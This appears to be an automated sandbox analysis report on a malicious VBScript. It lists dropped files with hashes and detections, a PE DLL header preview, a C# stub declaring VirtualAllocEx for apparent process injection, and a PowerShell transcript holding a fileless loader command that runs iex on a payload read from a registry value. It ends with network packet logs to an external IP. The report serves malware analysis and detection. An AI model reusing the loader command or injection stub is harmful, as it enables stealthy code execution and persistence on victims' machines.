                                                                                                                                          SHA-512:7B8A65FE6574A80E26E4D7767610596FEEA1B5225C3E8C7E105C6AC83F5312399EDB4E3798C3AF4151BCA8EF84E3D07D1ED1C5440C8B66B2B8041408F0F2E4F0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: [{000214A0-0000-0000-C000-000000000046}]..Prop3=19,11..[InternetShortcut]..IDList=..URL=https://adobe.com/..
                                                                                                                                          C:\Users\user\AppData\Local\Temp\bowerbird.m3u
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):58
                                                                                                                                          Entropy (8bit):5.116264615668023
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:AtNBcCRVqrGZgME1:AKAArcE1
                                                                                                                                          MD5:FCA5D5C49A23B8614C6F821ABC873200
                                                                                                                                          SHA1:C6982C28BD133E0317D388EFDFE29CB78A5AB6BA
                                                                                                                                          SHA-256:9EC7D8CE210B398464E1AE84073DA79284983AEA1AE6AD5985DC77AE95C1C242
                                                                                                                                          SHA-512:534D876A9BA54CAD210D801582A285D0F9E4385660B6ABFA5C278396644FBD41B1C4F7B2A5FDDB3F6EBC1BDEAE5D99D6E2E34F149697642F4B7E0F0510C641E9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: faHHqDeJlByuQgYuKmjhviPLnmNtvZyJwtONsUcwIeBPlokSmxWvLayqrB
                                                                                                                                          C:\Users\user\AppData\Local\Temp\earmark.avchd
                                                                                                                                          Process:C:\Windows\System32\wscript.exe
                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):48128
                                                                                                                                          Entropy (8bit):7.67702661060525
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:Nh66vv4Fgs48pcQqQjeCE+2SfNfAhghqgwZJTpT/6gKffcSapyLeq6pTXY:TrYJ4586SfZKBJT2ffXhkD
                                                                                                                                          MD5:78B3444199A2932805D85CFDB30AD6FB
                                                                                                                                          SHA1:A1826A8BDD4AA6FC0BF2157A6063CCA5534A3A46
                                                                                                                                          SHA-256:66EAF5C2BC2EC2A01D74DB9CC50744C748388CD9B0FA1F07181E639E128803EF
                                                                                                                                          SHA-512:E940BE2888085DE21BA3BF736281D0BEEC6B2B96B7C6D2CD1458951FD20A9ABFA79677393918C7A3877949F6BFC4B33E17200C739AADE0BA33EF4D3F58A0C4ED
                                                                                                                                          Malicious:true
                                                                                                                                          Antivirus:
                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                          Joe Sandbox View:
                                                                                                                                          • Filename: 6znkPyTAVN7V.vbs, Detection: malicious, Browse
                                                                                                                                          • Filename: a7APrVP2o2vA.vbs, Detection: malicious, Browse
                                                                                                                                          • Filename: 03QKtPTOQpA1.vbs, Detection: malicious, Browse
                                                                                                                                          Preview: MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L......_...........!...I..................... ....@..................................t....@.................................@...X....................................................................................................................text............................... ..`.data........ ......................@....reloc..............................@..B................U..}..u..*.............}..u.1....}..u.1....}..u.1.....SWV..k...............^_[.1.H)...k.6u..j@h.0..h@...j.....@.Sh@...h. @.P......U..`.}..u..M..U..0......a.........................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gf33rpcq\CSC37B7B5B8D8A1469384B4E042B687670.TMP
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:MSVC .res
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):652
                                                                                                                                          Entropy (8bit):3.1059983471948236
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1MOak7YnqqmMPPN5Dlq5J:+RI+ycuZhNbakSdPNnqX
                                                                                                                                          MD5:95D58934AE501F4ADB82D7F4C02EDAAE
                                                                                                                                          SHA1:3103D6F9DEAFDFD18796CC8627DF5DE4F89AEBB4
                                                                                                                                          SHA-256:472483F2A01C5135380442B81F5EB97B95A73058D019D98F2184AF56961458B5
                                                                                                                                          SHA-512:237F43D99C07BF66CD80FDD57AFD924495EF8D9E8B44B64F2D238D9021D60F470CF177B2555EF2CB4160DDF79BBCEBC15B99888904603FC6F9E2C15EC23D2BD9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.f.3.3.r.p.c.q...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.f.3.3.r.p.c.q...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.0.cs
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):414
                                                                                                                                          Entropy (8bit):5.000775845755204
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
                                                                                                                                          MD5:216105852331C904BA5D540DE538DD4E
                                                                                                                                          SHA1:EE80274EBF645987E942277F7E0DE23B51011752
                                                                                                                                          SHA-256:408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
                                                                                                                                          SHA-512:602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
                                                                                                                                          Malicious:true
                                                                                                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.cmdline
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):369
                                                                                                                                          Entropy (8bit):5.26776679395388
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fV0zxs7+AEszIWXp+N23fVBH:p37Lvkmb6KHN0WZE89x
                                                                                                                                          MD5:FD0B0CC56616B812680C09A0B74E77DE
                                                                                                                                          SHA1:420FE1CDD255AC4A2EB364A0277D4DAFB9C4F899
                                                                                                                                          SHA-256:BA9974638D15489B3AF70C4DF3B7EC1CC1EB349B5CB7A207379BA9C9F0AC480E
                                                                                                                                          SHA-512:1F5C6E504A8265C83BF79EDF97670058973A654CF243E21F63341B6550696A7BC4BE0640FFFACB015D7646E4E107C897E83008FCA764918FD19A669D7DF7E3DC
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.0.cs"
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.dll
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):3584
                                                                                                                                          Entropy (8bit):2.633045662526388
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:etGS5M+WEei8MTx2qHtLUyBridWtGYwxhtkZfcAkEw7I+ycuZhNbakSdPNnq:6v7qMTxzJUyNcWQYwSJ/kV1ulba3Hq
                                                                                                                                          MD5:BFDEB38C6C2A8513E6C35152D37EEE6A
                                                                                                                                          SHA1:AB5BD941BDA2C18557F30C7074A03B10AE0C5169
                                                                                                                                          SHA-256:7803760A5BB01CEE5BCA26B70218E9AA5EDEDB8707230D9524EDCD9C786D7B03
                                                                                                                                          SHA-512:AEF5B59DEFC9BAB93ABE13975A8DA44BA83FE9D191E152A213939FEB2EACA0DBDDE2005AEC02D7DCAD4158A49A2473A8E671617B4ABF89DB4330C15CB66779F4
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z6._...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...............'...................................... 6............ H............ P.....P ......_.........e.....p.....v..........................._.!..._...!._.&..._.......+.....4.:.....6.......H.......P..................................................<Module>.gf33rpcq.dll.mme.W32.mscor
                                                                                                                                          C:\Users\user\AppData\Local\Temp\gf33rpcq\gf33rpcq.out
                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                          Category:modified
                                                                                                                                          Size (bytes):412
                                                                                                                                          Entropy (8bit):4.871364761010112
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DF59ED155C1D1CCF51.TMP
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):13269
                                                                                                                                          Entropy (8bit):0.6174234412588923
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:c9lLh9lLh9lIn9lIn9loB3F9loBV9lWB0eaWg5eapMs494Jb4EvrbakXhrbE:kBqoIUKKjpA4N9i
                                                                                                                                          MD5:3D6CA1B2D638D71DF821F140E465FEF8
                                                                                                                                          SHA1:819DC1E7616B6E6C184E4E889FD785BAD34EEFED
                                                                                                                                          SHA-256:5BEA8B499AEF03F3E5C9C1E1FE563EADA0E41017FAE731C3C0E88AE0230E5EB5
                                                                                                                                          SHA-512:E78CEF408D76BD9E58EAC6AFE96387F429A9DDC178ED0A826188C2ACAF3CDF1414D54AAF67CDD3D1F8E0C69580012564B49D392CC59BCEF0CFF1A53AD58EFC65
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFB0CD04804313B9D1.TMP
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40169
                                                                                                                                          Entropy (8bit):0.6745163349269476
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:kBqoxKAuvScS+357yGIGZMMYSGATRMMYSGAT6MMYSGATP:kBqoxKAuvScS+357yZQHRTRHRT6HRTP
                                                                                                                                          MD5:5F5949031A52E085626731F0151DF3AC
                                                                                                                                          SHA1:5AD1CA223F657D1550DF058AD9E9949FBAFCEF40
                                                                                                                                          SHA-256:00077CD4B9E9AD4FB3FCF05A09A5B40D3B6974C933C2EA282501D25797626F32
                                                                                                                                          SHA-512:603F4672028219703A3507AB435F17EF7B17BB2279DB876A00291D779D4C104848C9104AF79C4F0D2D3BD6E374A596AEE7D2A9CD70AEDA26E5E980A8DDD9DB3F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFCC0C7DB5ED67DF9E.TMP
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40065
                                                                                                                                          Entropy (8bit):0.6541737361432745
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:kBqoxKAuvScS+357yZ6fiKcreUfiKcreliKcrem:kBqoxKAuqR+357yZ8iKcS+iKcSliKcSm
                                                                                                                                          MD5:F12BBB69FC8854476283F4EE3AF68272
                                                                                                                                          SHA1:CBA61EFC5193514E604B7771D9AD53A0F95B548E
                                                                                                                                          SHA-256:2D572B00B2399ACCC0249106EFDFBD97070C148176BE46841C5BC0A9BA3CDA6B
                                                                                                                                          SHA-512:6BB6BDE3AF21FB54DF92EB93900D543BDFFDD8045E24701397699F537199D77A864444EDDBE38118726680F4C565E867246227FD9636F5A3BC76CBC143F49675
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Local\Temp\~DFD893D4E6D1758C04.TMP
                                                                                                                                          Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                          File Type:data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):40201
                                                                                                                                          Entropy (8bit):0.6810153704098243
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:96:kBqoxKAuvScS+TtfW98o/zJxxo/zJxKo/zJx/:kBqoxKAuqR+TtfW98YzJxxYzJxKYzJx/
                                                                                                                                          MD5:F33F2E1CB450AD4D1BB9BEB148FDCB78
                                                                                                                                          SHA1:76D5A9B19F0A4712E8DBD46C26006D049F336FCE
                                                                                                                                          SHA-256:623808588AFDEC44D9FBD8528AEE3D4D43951FDBCBCA0CCBB35215F33A1709EC
                                                                                                                                          SHA-512:259C50BAE0086E69B5622727E33D223B472A0288EA4CB7976ECE99CBDF82C18CD7796C09F887C229B035A7F92272D550D14EF933DBCB2BDA1D3D41E88BFB91D0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}
                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):54
                                                                                                                                          Entropy (8bit):4.152970956533509
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:yc3uW+5R+FXddBWD1UEPv:yKu14IDeEX
                                                                                                                                          MD5:891BDB4EA9E04B9B5981E9065FFE41B4
                                                                                                                                          SHA1:2B880F4EE99E581B0A3BA955CFF93870192F14B0
                                                                                                                                          SHA-256:5F707C4CBEA96AABDE09290B98303E1F7EF946B6800A113CA8F885B1B2CE0F00
                                                                                                                                          SHA-512:641C0AA4082EBF08A6701F955310CC6F67B720D364DC482FDF57F95FC5A72926571A1B24CC92D638DF72B006374DA2F916356BCD0A662FF2D5AD8AB4A96C996B
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: 20-11-2020 13:34:47 | "0xb88d3fdf_5fa2c4f12d12f" | 1..
                                                                                                                                          C:\Users\user\Documents\20201120\PowerShell_transcript.284992.umVzyGW1.20201120133403.txt
                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1189
                                                                                                                                          Entropy (8bit):5.32288493808506
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:BxSA85xvBnUx2DOXUWOLCHGIYBtLW4HjeTKKjX4CIym1ZJX2OLCHGIYBtunxSAZL:BZ8LvhUoORF/4qDYB1ZcFFZZL
                                                                                                                                          MD5:C6B372195B2E3D82BEDC0C1BC82564E1
                                                                                                                                          SHA1:037A5A173991B6302BC68EB01D743C120001B2B1
                                                                                                                                          SHA-256:A75ADB161AB9C41B7F9E9297B4921F137DD49CB7BBFD7F7A4F5FE4EF2CCA9DFE
                                                                                                                                          SHA-512:0502A68172023A8368325D06D76ACD6E40D0920AC086951FC2A0A53BCCD35214F8D19A66658741D9C0446A9B05ADDBABDC843242E123FF72496A9E3434A69CFD
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .**********************..Windows PowerShell transcript start..Start time: 20201120133403..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 284992 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..Process ID: 6356..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20201120133403..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).basebapi))..**********************..

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                          Entropy (8bit):4.287126159723977
                                                                                                                                          TrID:
                                                                                                                                            File name:0k4Vu1eOEIhU.vbs
                                                                                                                                            File size:373044
                                                                                                                                            MD5:a3ba204668130312404ae877445921c1
                                                                                                                                            SHA1:65f172cb351f3bf1b51b24ecf837dd1dab1731e0
                                                                                                                                            SHA256:c16c0ad19dc1f015c92f3232a1eaa069b71f99695331a12a67a650c4c7bdbf75
                                                                                                                                            SHA512:33d5e238a71204d2ace1c780020cff113b6f304a6471b9cfba7bb0f5f2f175b804015cf573bf8c247406fef6f179d50a4c5b73f9012b7a271a9d249b7b483a31
                                                                                                                                            SSDEEP:3072:VDRp0xBRYkxWblq7iQh6qDkLBPUdgyaHoJr6fpkJHe:hqRBxIl4P6qoL5Ud/PJOfpkJHe
                                                                                                                                            File Content Preview:' Alberich Greek martial temptress presto babe, Semite rueful re fairway Estes Steinberg paratroop finesse Bangladesh authenticate allusive grapevine scattergun late, tugging gorgon Bateman inexplicable. swingy bitumen Coriolanus foreign Osaka indivisible

                                                                                                                                            File Icon

                                                                                                                                            Icon Hash:e8d69ece869a9ec4

                                                                                                                                            Network Behavior

                                                                                                                                            Network Port Distribution

                                                                                                                                            TCP Packets

                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                            Nov 20, 2020 13:33:44.729579926 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:44.729674101 CET4973280192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:44.981605053 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:44.981772900 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:44.982534885 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:44.987214088 CET804973247.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:44.987327099 CET4973280192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:45.276060104 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:45.971455097 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:45.971508980 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:45.971546888 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:45.971545935 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:45.971575022 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:45.971585989 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:45.971590996 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:45.971625090 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:45.971647978 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:45.971662045 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:45.971671104 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:45.971714020 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.014738083 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.014792919 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.014818907 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.014837027 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.014842033 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.014884949 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.014894009 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.014941931 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.223750114 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.223829031 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.223860025 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.223887920 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.223928928 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.223928928 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.223968983 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.223994017 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224006891 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224015951 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224045992 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224061966 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224093914 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224137068 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224144936 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224174023 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224210024 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224212885 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224225044 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224251986 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.224277973 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.224301100 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.266976118 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267034054 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267065048 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267071962 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267093897 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267117023 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267121077 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267163038 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267200947 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267206907 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267240047 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267266035 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267278910 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.267285109 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.267846107 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476352930 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476411104 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476450920 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476473093 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476489067 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476497889 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476527929 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476567030 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476588964 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476602077 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476605892 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476650953 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476653099 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476697922 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476737022 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476742029 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476774931 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476815939 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476829052 CET4973180192.168.2.347.241.19.44
                                                                                                                                            Nov 20, 2020 13:33:46.476852894 CET804973147.241.19.44192.168.2.3
                                                                                                                                            Nov 20, 2020 13:33:46.476891994 CET804973147.241.19.44192.168.2.3
